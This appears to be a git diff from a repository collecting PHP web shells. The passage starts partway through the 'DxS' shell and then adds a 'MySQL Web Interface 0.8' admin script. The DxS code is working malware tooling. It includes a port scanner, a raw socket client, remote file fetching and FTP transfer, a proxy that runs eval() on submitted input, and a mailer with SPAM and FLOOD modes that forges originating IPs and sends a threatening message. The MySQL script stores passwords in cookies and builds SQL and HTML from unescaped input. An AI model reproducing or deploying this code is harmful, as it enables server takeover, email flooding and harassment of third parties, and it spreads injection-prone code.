style="text-align:right;">'.$cur_port.'</td><td class=listing>'.$port_name.'</td><td class=listing>'.getservbyport($cur_port, 'tcp').'</td></tr>'; + } + } + list($usec, $sec) = explode(' ', microtime()); + $end=(float)$usec + (float)$sec; + + print "\n".'</table>'; + print "\n".'<font class="highlight_txt">Scanned '.count($TOSCAN).', '.$OKAY_PORTS.' opened. 
Time: '.($end-$start).'</font>'; + print "\n".'<br><hr>'."\n"; + } + + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<table border=0>' + .'<tr>' + .'<td colspan=2>' + .'<input type=text name="dxportscan[host]" value="'.((isset($_POST['dxportscan']['host']))?$_POST['dxportscan']['host'].'"':'127.0.0.1"').' SIZE=30>' + .'<input type=text name="dxportscan[timeout]" value="'.((isset($_POST['dxportscan']['timeout']))?$_POST['dxportscan']['timeout'].'"':'0.1"').' SIZE=10>' + .'</tr><tr>' + .'<td><textarea name="dxportscan[ports]" rows=3 cols=50>'.((isset($_POST['dxportscan']['ports']))?$_POST['dxportscan']['ports']:'21-25,35,80,3306').'</textarea>' + .'</td><td>' + .'<input type=checkbox name="dxportscan[ports]" value="#default"><a '.DxDesign_DrawBubbleBox('', 'To learn out what "main ports" are, click here', 300).' href="'.DxURL('kill','dxparam').'&dxparam=main_legend">#Scan main</a>' + .'<br><input type=submit value="Scan" class="submit" style="width:100pt;">' + .'</tr></table></form>'; + } + +######## +######## Raw s0cket +######## +if ($_GET['dxmode']=='SOCK') + { + $DEFQUERY=DxHTTPMakeHeaders('GET', '/index.php?get=q&get2=d', 'www.microsoft.com', 'DxS Browser', 'http://referer.com/', array('post_val' => 'Yeap'), array('cookiename' => 'val')); + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; print "\n".'<table width=100% cellspacing=0 celpadding=0>'; + print "\n".'<tr><td class=linelisting colspan=2 width=100%><input type=text name="dxsock_host" value="'.( (isset($_POST['dxsock_host'])?$_POST['dxsock_host']:'www.microsoft.com') ).'" style="width:100%;">'; + print "\n".'</td><td class=linelisting><nobr><input type=text name="dxsock_port" value="'.( (isset($_POST['dxsock_port'])?$_POST['dxsock_port']:'80') ).'" SIZE=10>' + .' 
timeout <input type=text name="dxsock_timeout" value="'.( (isset($_POST['dxsock_timeout'])?$_POST['dxsock_timeout']:'1.0') ).'" SIZE=4></td></tr>'; + print "\n".'<tr><td class=linelisting colspan=3>' + .'<textarea ROWS=15 name="dxsock_request" style="width:100%;">'.( (isset($_POST['dxsock_request'])?$_POST['dxsock_request']:$DEFQUERY) ).'</textarea>' + .'</td></tr>'; + print "\n".'<tr>' + .'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="HTML" '.( (isset($_POST['dxsock_type'])? (($_POST['dxsock_type']=='HTML')?'CHECKED':'') :'CHECKED') ).'>HTML</td>' + .'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="TEXT" '.( (isset($_POST['dxsock_type'])? (($_POST['dxsock_type']=='TEXT')?'CHECKED':'') :'') ).'>TEXT</td>' + .'<td class=linelisting width=100%><div align=right><input type=submit class=submit value="Send" style="width:100pt;height:20pt;"></td>' + .'</tr>'; + print "\n".'</table>'; + + if (!isset($_POST['dxsock_host'], $_POST['dxsock_port'], $_POST['dxsock_timeout'], $_POST['dxsock_request'], $_POST['dxsock_type'])) die(); + + print "\n".'<table width=100% cellspacing=0 celpadding=0>'; + print "\n".'<tr><td class=listing><pre><font class=highlight_txt>'.$_POST['dxsock_request'].'</font></pre></td></tr>'; + print "\n\n\n".'<tr><td class=listing>'; + + $fp=@fsockopen($_POST['dxsock_host'], $_POST['dxsock_port'], $errno, $errstr, (float)$_POST['dxsock_timeout']); + if (!$fp) die(DxError('Sock #'.$errno.' 
: '.$errstr)); + + if ($_POST['dxsock_type']=='TEXT') print '<plaintext>'; + + if (!empty($_POST['dxsock_request'])) fputs($fp, $_POST['dxsock_request']); + $ret=''; + while (!feof($fp)) $ret.=fgets($fp, 4096 ); + fclose( $fp ); + + if ($_POST['dxsock_type']=='HTML') $headers_over_place=strpos($ret,"\r\n\r\n"); else $headers_over_place=FALSE; + + if ($headers_over_place===FALSE) print $ret; + else print '<pre>'.substr($ret, 0, $headers_over_place).'</pre><br><hr><br>'.substr($ret, $headers_over_place); + + if ($_POST['dxsock_type']=='HTML') print "\n".'</td></tr></table>'; + } + +######## +######## FTP, HTTP file transfers +######## +if ($_GET['dxmode']=='FTP') + { print "\n".'<table align=center width=100%><col span=3 align=right width=33%><tr><td align=center><font class="highlight_txt"><b>HTTP Download</td><td align=center><font class="highlight_txt"><b>FTP Download</td><td align=center><font class="highlight_txt"><b>FTP Upload</td></tr>'; + + print "\n".'<tr><td>'; /* HTTP GET */ + print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n\t".'<input type=text name="DxFTP_HTTP" value="http://" style="width:100%;">'; + print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt" style="width:100%;">'; + print "\n\t".'<input type=submit value="GET!" 
style="width:150pt;" class=submit></form>'; + print "\n".'</td><td>'; /* FTP DOWNL */ + print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">'; + print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>'; + print "\n\t".'<input type=text name="DxFTP_FileOF" value="get.txt" style="width:100%;">'; + print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/" style="width:100%;">'; + print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>'; + print "\n\t".'<input type=submit name="DxFTP_DWN" value="Download!" style="width:150pt;" class=submit></form>'; + print "\n".'</td><td>'; /* FTP UPL */ + print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">'; + print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>'; + print "\n\t".'<input type=text name="DxFTP_FileOF" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt'.'" style="width:100%;">'; + print "\n\t".'<input type=text name="DxFTP_FileTO" value="put.txt" style="width:100%;">'; + print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>'; + print "\n\t".'<input type=submit name="DxFTP_UPL" value="Upload!" 
style="width:150pt;" class=submit></form>'; + print "\n".'</td></tr></table>'; + + if (isset($_POST['DxFTP_HTTP'])) { $URLPARSED=parse_url($_POST['DxFTP_HTTP']); $request=DxHTTPMakeHeaders('GET', $URLPARSED['path'].'?'.$URLPARSED['query'], $URLPARSED['host']); + if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10))) die(DxError('Sock #'.$errno.' : '.$errstr)); + fputs($f, $request); + + $GETFILE=''; + while (!feof($f)) $GETFILE.=fgets($f, 4096 ); + fclose( $f ); + + DxFiles_UploadHere($_POST['DxFTP_FileTO'], '', $GETFILE); + } + + if (isset($_POST['DxFTP_DWN']) OR isset($_POST['DxFTP_UPL'])) + { $DxFTP_SERV=explode(':',$_POST['DxFTP_FTP']); + if(empty($DxFTP_SERV[1])) {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = 21;} else {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = (int)$DxFTP_SERV[1];} + if (!($FTP=ftp_connect($DxFTP_SERV,$DxFTP_PORT,10))) die(DxError('No connection')); + if (!ftp_login($FTP, $_POST['DxFTP_USER'], $_POST['DxFTP_PASS'])) die(DxError('Login failed')); + if (isset($_POST['DxFTP_UPL'])) + if (!ftp_put($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII)) + die(DxError('Failed to upload')); else print 'Upload OK'; + if (isset($_POST['DxFTP_DWN'])) + if (!ftp_get($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII)) + die(DxError('Failed to download')); else print 'Download OK'; + ftp_close($FTP); + } + } + +######## +######## HTTP Proxy +######## +if ($_GET['dxmode']=='PROX') + { + print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>'; print "\n".'<table width=100% cellspacing=0>'; + print "\n".'<tr><td width=100pt class=linelisting>URL</td><td><input type=text name="DxProx_Url" value="'.(isset($_POST['DxProx_Url'])?$_POST['DxProx_Url']:'http://www.microsoft.com:80/index.php?get=q&get2=d').'" style="width:100%;"></td></tr>'; + print "\n".'<tr><td width=100pt colspan=2 
class=linelisting><nobr>Browser <input type=text name="DxProx_Brw" value="'.(isset($_POST['DxProx_Brw'])?$_POST['DxProx_Brw']:'DxS Browser').'" style="width:40%;">' + .' Referer <input type=text name="DxProx_Ref" value="'.(isset($_POST['DxProx_Ref'])?$_POST['DxProx_Ref']:'http://www.ref.ru/').'" style="width:40%;"></td></tr>'; + print "\n".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><td><input type=text name="DxProx_PST" value="'.(isset($_POST['DxProx_PST'])?$_POST['DxProx_PST']:'array(\'post_val\' => \'Yeap\')').'" style="width:100%;"></td></tr>'; + print "\n".'<tr><td width=100pt class=linelisting><nobr>COOKIES (php eval)</td><td><input type=text name="DxProx_CKI" value="'.(isset($_POST['DxProx_CKI'])?$_POST['DxProx_CKI']:'array(\'cookiename\' => \'val\')').'" style="width:100%;"></td></tr>'; + print "\n".'<tr><td colspan=2><input type=submit value="Go" class=submit style="width:100%;">'; + print "\n".'</td></tr></table></form>'; + + if (!isset($_POST['DxProx_Url'])) die(); + + print str_repeat("\n", 10).'<!-- DxS Proxy Browser -->'."\n\n"; + + if (empty($_POST['DxProx_PST'])) $_POST['DxProx_PST']=array(); + else {if (eval('$_POST[\'DxProx_PST\']='.$_POST['DxProx_PST'].';')===FALSE) $_POST['DxProx_PST']=array();} + if (empty($_POST['DxProx_CKI'])) $_POST['DxProx_CKI']=array(); + else {if (eval('$_POST[\'DxProx_CKI\']='.$_POST['DxProx_CKI'].';')===FALSE) $_POST['DxProx_CKI']=array();} + + $URLPARSED=parse_url($_POST['DxProx_Url']); + $request=DxHTTPMakeHeaders('GET', (empty($URLPARSED['path'])?'/':$URLPARSED['path']).(!empty($URLPARSED['query'])?'?'.$URLPARSED['query']:''), $URLPARSED['host'], $_POST['DxProx_Brw'], $_POST['DxProx_Ref'], $_POST['DxProx_PST'], $_POST['DxProx_CKI']); + if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10))) + die(DxError('Sock #'.$errno.' 
: '.$errstr)); + fputs($f, $request); + + $RET=''; + while (!feof($f)) $RET.=fgets($f, 4096 ); + fclose( $f ); + + print "\n".'<table width=100% border=0><tr><td>'; + $headers_over_place=strpos($RET,"\r\n\r\n"); + if ($headers_over_place===FALSE) print $RET; + else + print '<pre><font class=highlight_txt>'.substr($RET, 0, $headers_over_place).'</font></pre><br><hr><br>'.substr($RET, $headers_over_place); + print str_repeat("\n", 10).'</td></tr></table>'; + } + +######## +######## MAIL +######## +if ($_GET['dxmode']=='MAIL') + { if (!isset($_GET['dxparam'])) + { + print ''; print "\n".'<form action="'.DxURL('kill', '').'" method=GET style="display:inline;">'; + DxGETinForm('leave', ''); + print "\n".'<input type=submit name="dxparam" value="SPAM" style="position: absolute; width: 30%; left: 10%;">' + .'<font class=highlight_txt style="position:absolute;left:46.5%;">: MAIL mode :</font>' + .'<input type=submit name="dxparam" value="FLOOD" style="position: absolute; width: 30%; right: 10%;">'; + print "\n".'</form>'; + die();} + + if (ini_get('sendmail_path')=='') DxWarning('php.ini "sendmail_path" is empty! 
('.var_export(ini_get('sendmail_path'), true).')'); + print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<table width=100% cellspacing=0 width=90% align=center><col width=100pt>'; + if ($_GET['dxparam']=='FLOOD') + { print "\n".'<tr><td class=linelisting><b>TO: </td><td><input type=text name="DxMailer_TO" style="width:100%;" value="'.( (empty($_POST['DxMailer_TO']))?'tristam@mail.ru':$_POST['DxMailer_TO'] ).'"></td></tr>'; + print "\n".'<tr><td class=linelisting><b>NUM FLOOD: </td><td><input type=text name="DxMailer_NUM" value="'.( (empty($_POST['DxMailer_NUM']))?'1000':$_POST['DxMailer_NUM'] ).'" SIZE=10></td></tr>'; + } + else print "\n".'<tr><td class=linelisting><b>TO: </td><td><textarea name="DxMailer_TO" rows=10 style="width:100%;">'.( (empty($_POST['DxMailer_TO']))?'tristam@mail.ru'."\n".'billy@microsoft.com':$_POST['DxMailer_TO'] ).'</textarea></td></tr>'; + print "\n".'<tr><td class=linelisting><b>FROM: </td><td><input type=text name="DxMailer_FROM" value="'.( (empty($_POST['DxMailer_FROM']))?'DxS <admin@'.$_SERVER['HTTP_HOST']:$_POST['DxMailer_FROM'] ).'>" style="width:100%;"></td></tr>'; + print "\n".'<tr><td class=linelisting><b>SUBJ: </td><td><input type=text name="DxMailer_SUBJ" style="width:100%;" value="'.( (empty($_POST['DxMailer_SUBJ']))?'Look here, man...':$_POST['DxMailer_SUBJ'] ).'"></td></tr>'; + print "\n".'<tr><td class=linelisting><b>MSG: </td><td><textarea name="DxMailer_MSG" rows=5 style="width:100%;">'.( (empty($_POST['DxMailer_MSG']))?'<html><body><b>Wanna be butchered?':$_POST['DxMailer_MSG'] ).'</textarea></td></tr>'; + print "\n".'<tr><td class=linelisting colspan=2><div align=center><input type=submit Value="'.$_GET['dxparam'].'" class=submit style="width:70%;"></tr>'; + print "\n".'</td></table></form>'; + + if (!isset($_POST['DxMailer_TO'])) die(); + + $HEADERS=''; + $HEADERS.= 'MIME-Version: 1.0'."\r\n"; + $HEADERS.= 'Content-type: text/html;'."\r\n"; + $HEADERS.='To: %%TO%%'."\r\n"; + 
$HEADERS.='From: '.$_POST['DxMailer_FROM']."\r\n"; + $HEADERS.='X-Originating-IP: [%%IP%%]'."\r\n"; + $HEADERS.='X-Mailer: DxS v'.$GLOB['SHELL']['Ver'].' Mailer'."\r\n"; + $HEADERS.='Message-Id: <%%ID%%>'; + + if ($_GET['dxparam']=='FLOOD') + { $NUM=$_POST['DxMailer_NUM']; + $MAILS=array($_POST['DxMailer_TO']); + } + else + { $MAILS=explode("\n",str_replace("\r", '', $_POST['DxMailer_TO'])); + $NUM=1; + } + + function DxMail($t, $s, $m, $h) /* debugger */ + {print "\n\n\n<br><br><br>".$t."\n<br>".$s."\n<br>".$m."\n<br>".$h;} + + $RESULTS[]=array(); + + for ($n=0;$n<$NUM;$n++) + for ($m=0;$m<count($MAILS);$m++) $RESULTS[]=(int) + mail($MAILS[$m], $_POST['DxMailer_SUBJ'], $_POST['DxMailer_MSG'], + str_replace(array('%%TO%%','%%IP%%', '%%ID%%'), + array('<'.$MAILS[$m].'>' , long2ip(mt_rand(0,pow(2,31))) , md5($n.$m.DxRandomChars(3).time())), + $HEADERS) + ); + + print "\n\n".'<br><br>'.array_sum($RESULTS).' mails sent ('.( (100*array_sum($RESULTS))/($NUM*(count($MAILS))) ).'% okay)'; + + } + +if ($DXGLOBALSHIT) print "\n\n\n".'<!--/SHIT KILLER--></TD></TR></TABLE>'; +die(); +?> +
diff --git a/php/PHPshell/MySQL Web Interface Version 0.8/MySQL Web Interface Version 0.8.jpg b/php/PHPshell/MySQL Web Interface Version 0.8/MySQL Web Interface Version 0.8.jpg
new file mode 100644
index 0000000..e5ff040
Binary files /dev/null and b/php/PHPshell/MySQL Web Interface Version 0.8/MySQL Web Interface Version 0.8.jpg differ
diff --git a/php/PHPshell/MySQL Web Interface Version 0.8/MySQL Web Interface Version 0.8.php b/php/PHPshell/MySQL Web Interface Version 0.8/MySQL Web Interface Version 0.8.php
new file mode 100644
index 0000000..9f37027
--- /dev/null
+++ b/php/PHPshell/MySQL Web Interface Version 0.8/MySQL Web Interface Version 0.8.php
@@ -0,0 +1,1302 @@
+<?
+/*
+* MySQL Web Interface Version 0.8
+* -------------------------------
+* Developed By SooMin Kim (smkim@popeye.snu.ac.kr)
+* License : GNU Public License (GPL)
+* Homepage : http://popeye.snu.ac.kr/~smkim/mysql
+*/
+
+$HOSTNAME = "localhost";
+
+function logon() {
+ global $PHP_SELF;
+
+ setcookie( "mysql_web_admin_username" );
+ setcookie( "mysql_web_admin_password" );
+ echo "<html>\n";
+ echo "<head>\n";
+ echo "<title>MySQL Web Interface</title>\n";
+ echo "</head>\n";
+ echo "<body>\n";
+ echo "<table width=100% height=100%><tr><td><center>\n";
+ echo "<table cellpadding=2><tr><td bgcolor=#a4a260><center>\n";
+ echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n";
+ echo "<h1>MySQL Web Interface</h1>\n";
+ echo "<form action='$PHP_SELF'>\n";
+ echo "<input type=hidden name=action value=logon_submit>\n";
+ echo "<table cellpadding=5 cellspacing=1>\n";
+ echo "<tr><td>Username </td><td> <input type=text
+name=username></td></tr>\n";
+ echo "<tr><td>Password </td><td> <input type=password
+name=password></td></tr>\n";
+ echo "</table><p>\n";
+ echo "<input type=submit value='Enter'>\n";
+ echo "<input type=reset value='Clear'><br>\n";
+ echo "</form>\n";
+ echo "</center></td></tr></table>\n";
+ echo "</center></td></tr></table>\n";
+ echo "<p><hr width=300>\n";
+ echo "<font size=2>\n";
+ echo "Copyleft &copy; since 1999,\n";
+ echo "<a href='mailto:smkim76@icqmail.com'>SooMin Kim</a><br>\n";
+ echo "<a href='http://popeye.snu.ac.kr/~smkim/mysql'>Hompage<a> is
+available<br>";
+ echo "</font>\n";
+ echo "</center></td></tr></table>\n";
+ echo "</body>\n";
+ echo "</html>\n";
+}
+
+function logon_submit() {
+ global $username, $password, $PHP_SELF;
+
+ setcookie( "mysql_web_admin_username", $username );
+ setcookie( "mysql_web_admin_password", $password );
+ echo "<html>";
+ echo "<head>";
+ echo "<META HTTP-EQUIV=Refresh CONTENT='0;
+URL=$PHP_SELF?action=listDBs'>";
+ echo "</head>";
+ echo "</html>";
+}
+
+function
echoQueryResult() { + global $queryStr, $errMsg; + + if( $errMsg == "" ) $errMsg = "Success"; + if( $queryStr != "" ) { + echo "<table cellpadding=5>\n"; + echo "<tr><td>Query</td><td>$queryStr</td></tr>\n"; + echo "<tr><td>Result</td><td>$errMsg</td></tr>\n"; + echo "</table><p>\n"; + } +} + +function listDatabases() { + global $mysqlHandle, $PHP_SELF; + + echo "<h1>Database List</h1>\n"; + + echo "<form action='$PHP_SELF'>\n"; + echo "<input type=hidden name=action value=createDB>\n"; + echo "<input type=text name=dbname>\n"; + echo "<input type=submit value='Create Database'>\n"; + echo "</form>\n"; + echo "<hr>\n"; + + echo "<table cellspacing=1 cellpadding=5>\n"; + + $pDB = mysql_list_dbs( $mysqlHandle ); + $num = mysql_num_rows( $pDB ); + for( $i = 0; $i < $num; $i++ ) { + $dbname = mysql_dbname( $pDB, $i ); + echo "<tr>\n"; + echo "<td>$dbname</td>\n"; + echo "<td><a +href='$PHP_SELF?action=listTables&dbname=$dbname'>Table</a></td>\n"; + echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' +onClick=\"return confirm('Drop Database +\'$dbname\'?')\">Drop</a></td>\n"; + echo "<td><a +href='$PHP_SELF?action=dumpDB&dbname=$dbname'>Dump</a></td>\n"; + echo "</tr>\n"; + } + echo "</table>\n"; +} + +function createDatabase() { + global $mysqlHandle, $dbname, $PHP_SELF; + + mysql_create_db( $dbname, $mysqlHandle ); + listDatabases(); +} + +function dropDatabase() { + global $mysqlHandle, $dbname, $PHP_SELF; + + mysql_drop_db( $dbname, $mysqlHandle ); + listDatabases(); +} + +function listTables() { + global $mysqlHandle, $dbname, $PHP_SELF; + + echo "<h1>Table List</h1>\n"; + echo "<p class=location>$dbname</p>\n"; + echoQueryResult(); + echo "<form action='$PHP_SELF'>\n"; + echo "<input type=hidden name=action value=createTable>\n"; + echo "<input type=hidden name=dbname value=$dbname>\n"; + echo "<input type=text name=tablename>\n"; + echo "<input type=submit value='Create Table'>\n"; + echo "</form>\n"; + echo "<form action='$PHP_SELF'>\n"; + echo "<input 
type=hidden name=action value=query>\n"; + echo "<input type=hidden name=dbname value=$dbname>\n"; + echo "<input type=text size=40 name=queryStr>\n"; + //echo "<textarea cols=30 rows=3 name=queryStr></textarea><br>"; + echo "<input type=submit value='Query'>\n"; + echo "</form>\n"; + echo "<hr>\n"; + + $pTable = mysql_list_tables( $dbname ); + + if( $pTable == 0 ) { + $msg = mysql_error(); + echo "<h3>Error : $msg</h3><p>\n"; + return; + } + $num = mysql_num_rows( $pTable ); + + echo "<table cellspacing=1 cellpadding=5>\n"; + + for( $i = 0; $i < $num; $i++ ) { + $tablename = mysql_tablename( $pTable, $i ); + + echo "<tr>\n"; + echo "<td>\n"; + echo "$tablename\n"; + echo "</td>\n"; + echo "<td>\n"; + echo "<a +href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n"; + echo "</td>\n"; + echo "<td>\n"; + echo "<a +href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n"; + echo "</td>\n"; + echo "<td>\n"; + echo "<a +href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' +onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a>\n"; + echo "</td>\n"; + echo "<td>\n"; + echo "<a +href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>\n"; + echo "</td>\n"; + echo "</tr>\n"; + } + + echo "</table>"; +} + +function createTable() { + global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, +$errMsg; + + $queryStr = "CREATE TABLE $tablename ( no INT )"; + mysql_select_db( $dbname, $mysqlHandle ); + mysql_query( $queryStr, $mysqlHandle ); + $errMsg = mysql_error(); + + listTables(); +} + +function dropTable() { + global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, +$errMsg; + + $queryStr = "DROP TABLE $tablename"; + mysql_select_db( $dbname, $mysqlHandle ); + mysql_query( $queryStr, $mysqlHandle ); + $errMsg = mysql_error(); + + listTables(); +} + +function viewSchema() { + global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, +$errMsg; + + echo 
"<h1>Table Schema</h1>\n"; + echo "<p class=location>$dbname &gt; $tablename</p>\n"; + + echoQueryResult(); + + echo "<a +href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add +Field</a> | \n"; + echo "<a +href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>View +Data</a>\n"; + echo "<hr>\n"; + + $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" ); + $num = mysql_num_rows( $pResult ); + + echo "<table cellspacing=1 cellpadding=5>\n"; + echo "<tr>\n"; + echo "<th>Field</th>\n"; + echo "<th>Type</th>\n"; + echo "<th>Null</th>\n"; + echo "<th>Key</th>\n"; + echo "<th>Default</th>\n"; + echo "<th>Extra</th>\n"; + echo "<th colspan=2>Action</th>\n"; + echo "</tr>\n"; + + for( $i = 0; $i < $num; $i++ ) { + $field = mysql_fetch_array( $pResult ); + echo "<tr>\n"; + echo "<td>".$field["Field"]."</td>\n"; + echo "<td>".$field["Type"]."</td>\n"; + echo "<td>".$field["Null"]."</td>\n"; + echo "<td>".$field["Key"]."</td>\n"; + echo "<td>".$field["Default"]."</td>\n"; + echo "<td>".$field["Extra"]."</td>\n"; + $fieldname = $field["Field"]; + echo "<td><a +href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n"; + echo "<td><a +href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' +onClick=\"return confirm('Drop Field +\'$fieldname\'?')\">Drop</a></td>\n"; + echo "</tr>\n"; + } + echo "</table>\n"; +} + +function manageField( $cmd ) { + global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF; + + if( $cmd == "add" ) + echo "<h1>Add Field</h1>\n"; + else if( $cmd == "edit" ) { + echo "<h1>Edit Field</h1>\n"; + $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" ); + $num = mysql_num_rows( $pResult ); + for( $i = 0; $i < $num; $i++ ) { + $field = mysql_fetch_array( $pResult ); + if( $field["Field"] == $fieldname ) { + $fieldtype = $field["Type"]; + $fieldkey = $field["Key"]; + $fieldextra = $field["Extra"]; + $fieldnull 
= $field["Null"]; + $fielddefault = $field["Default"]; + break; + } + } + $type = strtok( $fieldtype, " (,)\n" ); + if( strpos( $fieldtype, "(" ) ) { + if( $type == "enum" | $type == "set" ) { + $valuelist = strtok( " ()\n" ); + } else { + $M = strtok( " (,)\n" ); + if( strpos( $fieldtype, "," ) ) + $D = strtok( " (,)\n" ); + } + } + } + + echo "<p class=location>$dbname &gt; $tablename</p>\n"; + echo "<form action=$PHP_SELF>\n"; + + if( $cmd == "add" ) + echo "<input type=hidden name=action value=addField_submit>\n"; + else if( $cmd == "edit" ) { + echo "<input type=hidden name=action value=editField_submit>\n"; + echo "<input type=hidden name=old_name value=$fieldname>\n"; + } + echo "<input type=hidden name=dbname value=$dbname>\n"; + echo "<input type=hidden name=tablename value=$tablename>\n"; + + echo "<h3>Name</h3>\n"; + echo "<input type=text name=name value=$fieldname><p>\n"; +?> + +<h3>Type</h3> + +<font size=2> +* `M' indicates the maximum display size.<br> +* `D' applies to floating-point types and indicates the number of +digits +following the decimal point.<br> +</font> + +<table> +<tr> +<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th> +</tr> +<tr> +<td><input type=radio name=type value="TINYINT" <? if( $type == +"tinyint" ) +echo "checked";?>>TINYINT (-128 ~ 127)</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="SMALLINT" <? if( $type == +"smallint" +) echo "checked";?>>SMALLINT (-32768 ~ 32767)</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="MEDIUMINT" <? 
if( $type == +"mediumint" ) echo "checked";?>>MEDIUMINT (-8388608 ~ 8388607)</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="INT" <? if( $type == "int" ) +echo +"checked";?>>INT (-2147483648 ~ 2147483647)</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="BIGINT" <? if( $type == "bigint" +) +echo "checked";?>>BIGINT (-9223372036854775808 ~ +9223372036854775807)</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="FLOAT" <? if( $type == "float" ) +echo +"checked";?>>FLOAT</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="DOUBLE" <? if( $type == "double" +) +echo "checked";?>>DOUBLE</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="DECIMAL" <? if( $type == +"decimal" ) +echo "checked";?>>DECIMAL(NUMERIC)</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="DATE" <? if( $type == "date" ) +echo +"checked";?>>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="DATETIME" <? if( $type == +"datetime" +) echo "checked";?>>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 +23:59:59, +YYYY-MM-DD HH:MM:SS)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="TIMESTAMP" <? 
